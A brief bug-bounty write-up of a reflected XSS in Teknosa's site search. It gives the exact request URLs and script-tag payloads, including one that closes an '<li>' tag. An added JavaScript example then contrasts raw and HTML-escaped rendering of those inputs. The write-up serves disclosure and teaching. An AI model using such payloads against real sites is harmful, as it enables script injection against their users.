XSS in Teknosa Write-up (less than 5 minutes)

Hi everyone, this is a write-up. I will describe my bug reports, so I think I should start with an easy bug.
I tried the search bar for XSS like everybody.

Request: 
https://www.teknosa.com/arama/?s=</>alert()
Response (view-source):
...<li></>alert()</li>...
I tried this payload:
<script>alert(1)</script>
but this payload did not trigger XSS, so I tried it again with </li>.

Request:
https://www.teknosa.com/arama/?s=</li><script>alert(1)</script>
Response:
I reported it to Teknosa by mail. They fixed this vulnerability but they didn't even congratulate me.
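
For the defensive side of the reflection shown above, here is an added example (not from the original post and not Teknosa's code) that renders a search term into an `<li>` element both raw and HTML-encoded, using the `s` parameter values from this write-up as input. The function names and the surrounding `<ul>` markup are assumptions made for illustration.

```javascript
// Added example: hypothetical renderer for a search-results fragment.
// Function names and markup are assumptions, not the site's real code.

// Encode the characters that are significant in HTML text and
// quoted-attribute contexts. '&' must be replaced first so that the
// entities produced by the later replacements are not double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the raw query is concatenated into the <li> element,
// matching the reflection seen in the write-up's view-source output.
function renderVulnerable(query) {
  return "<ul><li>" + query + "</li></ul>";
}

// Hardened: the query is encoded for the HTML text context before output,
// so it can neither close the <li> nor open a new element.
function renderHardened(query) {
  return "<ul><li>" + escapeHtml(query) + "</li></ul>";
}

// True if the rendered fragment contains a literal <script> start tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Inputs taken from the write-up (values of the ?s= parameter).
const samples = [
  "</>alert()",
  "<script>alert(1)</script>",
  "</li><script>alert(1)</script>",
];

for (const q of samples) {
  console.log(JSON.stringify(q));
  console.log("  vulnerable:", renderVulnerable(q));
  console.log("  hardened:  ", renderHardened(q));
}
```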


